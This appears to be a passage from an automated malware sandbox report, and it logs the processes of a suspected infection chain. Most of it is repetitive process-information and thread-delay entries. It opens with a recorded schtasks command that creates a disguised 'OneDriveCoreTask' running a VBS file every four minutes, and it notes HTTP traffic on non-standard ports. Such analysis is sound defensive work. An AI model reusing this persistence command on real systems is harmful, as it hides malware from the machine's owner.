              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 58056 -> 43820
              Source: unknownNetwork traffic detected: HTTP traffic on port 58057 -> 43820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599015Jump to behavior
